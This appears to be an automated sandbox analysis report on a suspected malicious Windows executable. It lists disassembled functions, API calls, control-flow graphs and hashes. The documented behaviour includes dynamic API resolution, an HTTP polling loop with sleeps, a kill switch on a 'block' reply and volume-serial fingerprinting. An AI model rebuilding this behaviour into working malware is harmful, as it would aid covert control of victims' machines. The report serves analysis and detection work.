                          • GetProcAddress.KERNEL32(76210000,0123DCA0), ref: 00559FE2
                          • GetProcAddress.KERNEL32(76210000,0123DBC8), ref: 00559FFA
                          • GetProcAddress.KERNEL32(76210000,01225348), ref: 0055A013
                          • GetProcAddress.KERNEL32(76210000,01225408), ref: 0055A02B
                          • LoadLibraryA.KERNEL32(0123DCB8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
                          • LoadLibraryA.KERNEL32(0123DC58,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
                          • LoadLibraryA.KERNEL32(0123DBE0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
                          • LoadLibraryA.KERNEL32(0123DCD0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
                          • LoadLibraryA.KERNEL32(0123DC10,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
                          • LoadLibraryA.KERNEL32(0123DC28,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
                          • LoadLibraryA.KERNEL32(0123DC40,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
                          • LoadLibraryA.KERNEL32(0123DE38,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
                          • GetProcAddress.KERNEL32(751E0000,012251E8), ref: 0055A0DA
                          • GetProcAddress.KERNEL32(751E0000,0123DEB0), ref: 0055A0F2
                          • GetProcAddress.KERNEL32(751E0000,01238918), ref: 0055A10A
                          • GetProcAddress.KERNEL32(751E0000,0123DF70), ref: 0055A123
                          • GetProcAddress.KERNEL32(751E0000,012250A8), ref: 0055A13B
                          • GetProcAddress.KERNEL32(73FE0000,0122A658), ref: 0055A160
                          • GetProcAddress.KERNEL32(73FE0000,01224F88), ref: 0055A179
                          • GetProcAddress.KERNEL32(73FE0000,0122A748), ref: 0055A191
                          • GetProcAddress.KERNEL32(73FE0000,0123DEC8), ref: 0055A1A9
                          • GetProcAddress.KERNEL32(73FE0000,0123DEE0), ref: 0055A1C2
                          • GetProcAddress.KERNEL32(73FE0000,01225148), ref: 0055A1DA
                          • GetProcAddress.KERNEL32(73FE0000,01225208), ref: 0055A1F2
                          • GetProcAddress.KERNEL32(73FE0000,0123DF40), ref: 0055A20B
                          • GetProcAddress.KERNEL32(753A0000,01225008), ref: 0055A22C
                          • GetProcAddress.KERNEL32(753A0000,01224FE8), ref: 0055A244
                          • GetProcAddress.KERNEL32(753A0000,0123DDC0), ref: 0055A25D
                          • GetProcAddress.KERNEL32(753A0000,0123DDF0), ref: 0055A275
                          • GetProcAddress.KERNEL32(753A0000,01225108), ref: 0055A28D
                          • GetProcAddress.KERNEL32(76310000,0122A770), ref: 0055A2B3
                          • GetProcAddress.KERNEL32(76310000,0122A928), ref: 0055A2CB
                          • GetProcAddress.KERNEL32(76310000,0123DF10), ref: 0055A2E3
                          • GetProcAddress.KERNEL32(76310000,012252E8), ref: 0055A2FC
                          • GetProcAddress.KERNEL32(76310000,01225068), ref: 0055A314
                          • GetProcAddress.KERNEL32(76310000,0122A798), ref: 0055A32C
                          • GetProcAddress.KERNEL32(76910000,0123DE08), ref: 0055A352
                          • GetProcAddress.KERNEL32(76910000,01225308), ref: 0055A36A
                          • GetProcAddress.KERNEL32(76910000,012388D8), ref: 0055A382
                          • GetProcAddress.KERNEL32(76910000,0123DDD8), ref: 0055A39B
                          • GetProcAddress.KERNEL32(76910000,0123DEF8), ref: 0055A3B3
                          • GetProcAddress.KERNEL32(76910000,01225228), ref: 0055A3CB
                          • GetProcAddress.KERNEL32(76910000,01224FA8), ref: 0055A3E4
                          • GetProcAddress.KERNEL32(76910000,0123DF28), ref: 0055A3FC
                          • GetProcAddress.KERNEL32(76910000,0123DF58), ref: 0055A414
                          • GetProcAddress.KERNEL32(75B30000,01225128), ref: 0055A436
                          • GetProcAddress.KERNEL32(75B30000,0123DE80), ref: 0055A44E
                          • GetProcAddress.KERNEL32(75B30000,0123DE20), ref: 0055A466
                          • GetProcAddress.KERNEL32(75B30000,0123DE50), ref: 0055A47F
                          • GetProcAddress.KERNEL32(75B30000,0123DE68), ref: 0055A497
                          • GetProcAddress.KERNEL32(75670000,012250E8), ref: 0055A4B8
                          • GetProcAddress.KERNEL32(75670000,012250C8), ref: 0055A4D1
                          • GetProcAddress.KERNEL32(76AC0000,01225288), ref: 0055A4F2
                          • GetProcAddress.KERNEL32(76AC0000,0123DE98), ref: 0055A50A
                          • GetProcAddress.KERNEL32(6F4E0000,01225168), ref: 0055A530
                          • GetProcAddress.KERNEL32(6F4E0000,01225088), ref: 0055A548
                          • GetProcAddress.KERNEL32(6F4E0000,01225028), ref: 0055A560
                          • GetProcAddress.KERNEL32(6F4E0000,0123D880), ref: 0055A579
                          • GetProcAddress.KERNEL32(6F4E0000,01225248), ref: 0055A591
                          • GetProcAddress.KERNEL32(6F4E0000,01225048), ref: 0055A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,01225188), ref: 0055A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,01224F68), ref: 0055A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0055A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0055A607
                          • GetProcAddress.KERNEL32(75AE0000,0123D970), ref: 0055A629
                          • GetProcAddress.KERNEL32(75AE0000,01238968), ref: 0055A641
                          • GetProcAddress.KERNEL32(75AE0000,0123D940), ref: 0055A659
                          • GetProcAddress.KERNEL32(75AE0000,0123D7C0), ref: 0055A672
                          • GetProcAddress.KERNEL32(76300000,012251A8), ref: 0055A693
                          • GetProcAddress.KERNEL32(6FE40000,0123D910), ref: 0055A6B4
                          • GetProcAddress.KERNEL32(6FE40000,012251C8), ref: 0055A6CD
                          • GetProcAddress.KERNEL32(6FE40000,0123D928), ref: 0055A6E5
                          • GetProcAddress.KERNEL32(6FE40000,0123D838), ref: 0055A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                          • Instruction ID: 8c2bd1f46042af4331dff5695dd1bf9af67209197da10ad2c688805e08b5f95d
                          • Opcode Fuzzy Hash: ab8a27108a65ba8c055d097de610c528c0ed7bb585d3e44f9a6f01189315d8c2
                          • Instruction Fuzzy Hash: 4F623DB5680200BFF745DFA8ED889563BF9F79C701734C51BA609C3224D63DA452EB2A
                          Function 00546280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 546280-54630b call 55a7a0 call 5447b0 call 55a740 InternetOpenA StrCmpCA 1040 546314-546318 1033->1040 1041 54630d 1033->1041 1042 54631e-546342 InternetConnectA 1040->1042 1043 546509-546525 call 55a7a0 call 55a800 * 2 1040->1043 1041->1040 1045 5464ff-546503 InternetCloseHandle 1042->1045 1046 546348-54634c 1042->1046 1062 546528-54652d 1043->1062 1045->1043 1048 54634e-546358 1046->1048 1049 54635a 1046->1049 1051 546364-546392 HttpOpenRequestA 1048->1051 1049->1051 1053 5464f5-5464f9 InternetCloseHandle 1051->1053 1054 546398-54639c 1051->1054 1053->1045 1055 5463c5-546405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 54639e-5463bf InternetSetOptionA 1054->1056 1058 546407-546427 call 55a740 call 55a800 * 2 1055->1058 1059 54642c-54644b call 558940 1055->1059 1056->1055 1058->1062 1067 54644d-546454 1059->1067 1068 5464c9-5464e9 call 55a740 call 55a800 * 2 1059->1068 1071 546456-546480 InternetReadFile 1067->1071 1072 5464c7-5464ef InternetCloseHandle 1067->1072 1068->1062 1076 546482-546489 1071->1076 1077 54648b 1071->1077 1072->1053 1076->1077 1080 54648d-5464c5 call 55a9b0 call 55a8a0 call 55a800 1076->1080 1077->1072 1080->1071
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00546303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0123F440,00000000,00000000,00400100,00000000), ref: 00546385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
                          • InternetCloseHandle.WININET(00000000), ref: 005464EF
                          • InternetCloseHandle.WININET(00000000), ref: 005464F9
                          • InternetCloseHandle.WININET(00000000), ref: 00546503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                          • Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
                          • Opcode Fuzzy Hash: ab40f46a5d2469f8a56c078fce8667cc4f8a2533513d04537aace29373dedb36
                          • Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52
                          Function 00555510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 555510-555577 call 555ad0 call 55a820 * 3 call 55a740 * 4 1106 55557c-555583 1090->1106 1107 555585-5555b6 call 55a820 call 55a7a0 call 541590 call 5551f0 1106->1107 1108 5555d7-55564c call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1106->1108 1124 5555bb-5555d2 call 55a8a0 call 55a800 1107->1124 1134 555693-5556a9 call 55aad0 StrCmpCA 1108->1134 1138 55564e-55568e call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1108->1138 1124->1134 1139 5557dc-555844 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1134->1139 1140 5556af-5556b6 1134->1140 1138->1134 1270 555ac3-555ac6 1139->1270 1143 5556bc-5556c3 1140->1143 1144 5557da-55585f call 55aad0 StrCmpCA 1140->1144 1148 5556c5-555719 call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1143->1148 1149 55571e-555793 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1143->1149 1163 555865-55586c 1144->1163 1164 555991-5559f9 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1144->1164 1148->1144 1149->1144 1249 555795-5557d5 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1149->1249 1170 555872-555879 1163->1170 1171 55598f-555a14 call 55aad0 StrCmpCA 1163->1171 1164->1270 1179 5558d3-555948 call 55a740 * 2 call 541590 call 5552c0 call 55a8a0 call 55a800 call 55aad0 StrCmpCA 1170->1179 1180 55587b-5558ce call 55a820 call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1170->1180 1200 555a16-555a21 Sleep 1171->1200 1201 555a28-555a91 call 55a8a0 call 55a820 * 2 call 541670 call 55a800 * 4 call 556560 call 541550 1171->1201 1179->1171 1275 55594a-55598a call 55a7a0 call 541590 call 5551f0 call 55a8a0 call 55a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1144 1275->1171
                          APIs
                            • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                            • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
                            • Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
                            • Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00555A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                          • Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
                          • Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                          • Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6
                          Function 005517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 5517a0-5517cd call 55aad0 StrCmpCA 1304 5517d7-5517f1 call 55aad0 1301->1304 1305 5517cf-5517d1 ExitProcess 1301->1305 1309 5517f4-5517f8 1304->1309 1310 5519c2-5519cd call 55a800 1309->1310 1311 5517fe-551811 1309->1311 1312 551817-55181a 1311->1312 1313 55199e-5519bd 1311->1313 1315 551835-551844 call 55a820 1312->1315 1316 5518f1-551902 StrCmpCA 1312->1316 1317 551951-551962 StrCmpCA 1312->1317 1318 551970-551981 StrCmpCA 1312->1318 1319 551913-551924 StrCmpCA 1312->1319 1320 551932-551943 StrCmpCA 1312->1320 1321 55185d-55186e StrCmpCA 1312->1321 1322 55187f-551890 StrCmpCA 1312->1322 1323 551821-551830 call 55a820 1312->1323 1324 5518ad-5518be StrCmpCA 1312->1324 1325 5518cf-5518e0 StrCmpCA 1312->1325 1326 55198f-551999 call 55a820 1312->1326 1327 551849-551858 call 55a820 1312->1327 1313->1309 1315->1313 1333 551904-551907 1316->1333 1334 55190e 1316->1334 1339 551964-551967 1317->1339 1340 55196e 1317->1340 1342 551983-551986 1318->1342 1343 55198d 1318->1343 1335 551926-551929 1319->1335 1336 551930 1319->1336 1337 551945-551948 1320->1337 1338 55194f 1320->1338 1348 551870-551873 1321->1348 1349 55187a 1321->1349 1350 551892-55189c 1322->1350 1351 55189e-5518a1 1322->1351 1323->1313 1329 5518c0-5518c3 1324->1329 1330 5518ca 1324->1330 1331 5518e2-5518e5 1325->1331 1332 5518ec 1325->1332 1326->1313 1327->1313 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 5518a8 1350->1352 1351->1352 1352->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 005517C5
                          • ExitProcess.KERNEL32 ref: 005517D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: ecac5ca3af7dc88f869d8facffee70185fc94a6df276e9854900a6d7f71544c9
                          • Instruction ID: 9718d430643462fc169efdcf7e45ef393aae361b98d3e65a5e26ff3b68ad1b62
                          • Opcode Fuzzy Hash: ecac5ca3af7dc88f869d8facffee70185fc94a6df276e9854900a6d7f71544c9
                          • Instruction Fuzzy Hash: A75180B4A00209EFDB04DFA0D964BBE7FB5BF44705F10854EE906A7280D774E949CB66
                          Function 00557500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 557500-55754a GetWindowsDirectoryA 1357 557553-5575c7 GetVolumeInformationA call 558d00 * 3 1356->1357 1358 55754c 1356->1358 1365 5575d8-5575df 1357->1365 1358->1357 1366 5575e1-5575fa call 558d00 1365->1366 1367 5575fc-557617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 557619-557626 call 55a740 1367->1368 1369 557628-557658 wsprintfA call 55a740 1367->1369 1377 55767e-55768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
                          • wsprintfA.USER32 ref: 00557640
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$V
                          • API String ID: 1544550907-271220574
                          • Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                          • Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
                          • Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                          • Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5
                          Function 005569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012316B0), ref: 005598A1
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012315D8), ref: 005598BA
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012314E8), ref: 005598D2
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231500), ref: 005598EA
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231560), ref: 00559903
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01238908), ref: 0055991B
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01225628), ref: 00559933
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012255A8), ref: 0055994C
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231608), ref: 00559964
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,012316C8), ref: 0055997C
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231770), ref: 00559995
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231758), ref: 005599AD
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01225608), ref: 005599C5
                            • Part of subcall function 00559860: GetProcAddress.KERNEL32(76210000,01231530), ref: 005599DE
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211
                            • Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
